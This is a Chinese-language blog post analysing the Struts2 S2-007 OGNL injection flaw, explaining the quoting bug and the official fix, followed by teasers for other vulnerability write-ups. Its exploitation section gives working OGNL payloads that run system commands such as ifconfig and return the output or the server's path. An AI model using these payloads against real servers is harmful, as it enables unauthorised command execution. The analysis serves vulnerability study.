[JavaWeb]Struct2-007漏洞分析

阿新 • • 發佈：2022-01-17

Strut2-007

漏洞描述

Struts2-007是一個遠端程式碼執行漏洞。

影響版本

Struts 2.0.0 - Struts 2.2.3

漏洞分析

當碰到validator校驗失敗的會將資料重寫後放到OverrideStack

在處理時將字串兩邊同時添加了一個單引號
Struts2 結束標籤時，會將使用者輸入值經過 OGNL 執行並返回。如果先前 OgnlValueStack.overrides 儲存過相關欄位，則會先從 OgnlValueStack.overrides 中取出相關值，然後再通過 OGNL 執行
從ognl.overrides中找加了單引號的age，再經過ognl解析。

漏洞點，如果傳入的是'+{code}+',經過處理後就變為了''+{code}+''，再進行ognl解析，便可以被解析為程式碼，從而導致了任意程式碼執行

漏洞利用

# 彈計算器
'+(#context["xwork.MethodAccessor.denyMethodExecution"][email protected]@getRuntime().exec("deepin-calculator"))+'

'+(#_memberAccess["allowStaticMethodAccess"]=true#context["xwork.MethodAccessor.denyMethodExecution"][email protected]@getRuntime().exec("deepin-calculator"))+'

# 獲取絕對路徑
'+(#context["xwork.MethodAccessor.denyMethodExecution"]=false#[email protected]@getRequest()#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter().write(#req.getRealPath('/')))+'

'+(#_memberAccess["allowStaticMethodAccess"]=true#context["xwork.MethodAccessor.denyMethodExecution"]=false#[email protected]@getRequest()#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter().write(#req.getRealPath('/')))+'

# 執行系統命令並回顯
'+(#context["xwork.MethodAccessor.denyMethodExecution"]=false#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter().write(new java.util.Scanner(@java.lang.Runtime@getRuntime().exec('ifconfig').getInputStream()).useDelimiter("\\Z").next()))+'

'+(#_memberAccess["allowStaticMethodAccess"]=true#context["xwork.MethodAccessor.denyMethodExecution"]=false#response=#context.get("com.opensymphony.xwork2.dispatcher.HttpServletResponse").getWriter().write(new java.util.Scanner(@java.lang.Runtime@getRuntime().exec('ifconfig').getInputStream()).useDelimiter("\\Z").next()))+'

漏洞修復

官方先將傳入的字串進行了轉義，再在外邊加一個雙引號，從而確保只能是一個普通的字串。

[JavaWeb]Struct2-007漏洞分析

Strut2-007 漏洞描述 Struts2-007是一個遠端程式碼執行漏洞。影響版本 Struts 2.0.0 - Struts 2.2.3

Redis未授權訪問漏洞分析

Redis因配置不當和未授權訪問。導致無需認證就可以訪問到內部資料，可導致敏感資訊洩露，也可以通過config 命令，可以進行寫檔案操作。

【漏洞分析】Struts2-045分析（CVE-2017-5638）

struts2 - 045 一個還比較出名的漏洞，因為涉及到利用Gopher協議反彈shell，所以寫篇文章來簡單學習下這個漏洞。

CVE-2019-0230 s2-059 漏洞分析

0x01 問題原因 Apache Struts 框架在強制時對分配給某些標記屬性的屬性值執行雙重計算，以便可以傳遞一個值，該值將在呈現標記的屬性時再次計算。對於精心設計的請求，這可能會導致遠端程式碼執行（RCE）。

web漏洞分析防禦

漏洞分析，主要漏洞有一、跨站指令碼攻擊XSS 　　程式 + 資料 = 結果；攻擊後，資料夾雜一部分程式（執行程式碼），導致結果改變；

CVE-2020-9496 apache ofbiz xml-rpc反序列化漏洞分析

0x00 apache ofbiz介紹 OFBiz是一個非常著名的電子商務平臺，是一個非常著名的開源專案，提供了建立基於最新J2EE/XML規範和技術標準，構建大中型企業級、跨平臺、跨資料庫、跨應用伺服器的多層、分散式電子商務類WEB

wordpress外掛wpdiscuz任意檔案上傳漏洞分析

下載連結 https://downloads.wordpress.org/plugin/wpdiscuz.7.0.3.zip 測試環境 windows phpstudy phpstorm

Metasploit Framework 4.17.0 本地提權漏洞分析

存在漏洞的msf版本：Metasploit框架-Rapid7（Windows）4.17.0 測試用作業系統：Windows 10 1909（x64）

墨者學院_CMS系統漏洞分析溯源(第4題)

靶場： https://www.mozhe.cn/bug/detail/VFRndDEyR1JXVUFySmxzWk14NTRjUT09bW96aGUmozhe 背景介紹 ASPCMS是完全開源的一套CMS建站系統，主要面向企業進行快速的建造簡潔，高效，易用，安全的公司企業網站，

Maccms8.x 遠端命令執行漏洞分析

前言復現原始碼地址:https://github.com/yaofeifly/Maccms8.x 除錯中xdebug突然自動停止，新增下httpd.conf中的FcgidIOTimeout

Struts2最新安全漏洞分析

2019獨角獸企業重金招聘Python工程師標準>>> Struts是Apache軟體基金會Jakarta專案組的一個開源專案，它採用MVC模式，幫助java開發者利用J2EE開發Web應用。目前，Struts廣泛應用於大型網際網路

墨者學院WebShell檔案上傳漏洞分析溯源

** 1.第一題 ** 編寫一句話木馬，然後上傳檔案，改檔案不可上傳，改字尾為php5然後用菜刀連線連線成功開啟html，得到flag**

weblogic CVE-2020-2963、CNVD-2020-23019 反序列化漏洞分析與復現

簡介這兩個洞應該都是5月更新的補丁，分析時候無意中發現的。看了一下漏洞挺簡單，就是利用有點苛刻

S2-001漏洞分析

前言開始好好學Java，跟著師傅們的文章走一遍 Strust簡介 Struts2是流行和成熟的基於MVC設計模式的Web應用程式框架。 Struts2不只是Struts1下一個版本，它是一個完全重寫的Struts架構。

[程式碼審計] fengcms1.32從詳細漏洞分析到漏洞利用

##前言這是我在此發表的第一篇代碼審計的文章，僅供學習參考！首發於哈拉少安全小隊微信公眾號

Java安全之Shiro 550反序列化漏洞分析

Java安全之Shiro 550反序列化漏洞分析首發自安全客：Java安全之Shiro 550反序列化漏洞分析

JumpServer遠端執行漏洞分析

0x01 漏洞描述 JumpServer 是全球首款完全開源的堡壘機, 使用GNU GPL v2.0 開源協議, 是符合4A 的專業運維審計系統。JumpServer 使用Python / Django 進行開發。2021年1月15日，JumpServer釋出更新，修復了一處遠端

phpcms_v9.6.0 SQL注入漏洞分析

環境： phpstudy本地搭建phpcms apache2.4.39+php5.3.29+mysql8.0.12 漏洞影響版本： PHPCMS 9.6.0

phpcms 9.6.1任意檔案下載漏洞分析

環境： phpstudy本地搭建phpcms apache2.4.39+php5.3.29+mysql8.0.12 漏洞影響版本： PHPCMS 9.6.1

Bash漏洞分析

實訓目標 1.瞭解bash； Bash（GNU Bourne-Again Shell）是一個命令處理器，通常運行於文字視窗中，並能執行使用者直接輸入的命令。Bash還能從檔案中讀取命令，這樣的檔案稱為指令碼。和其他Unix shell 一樣，它支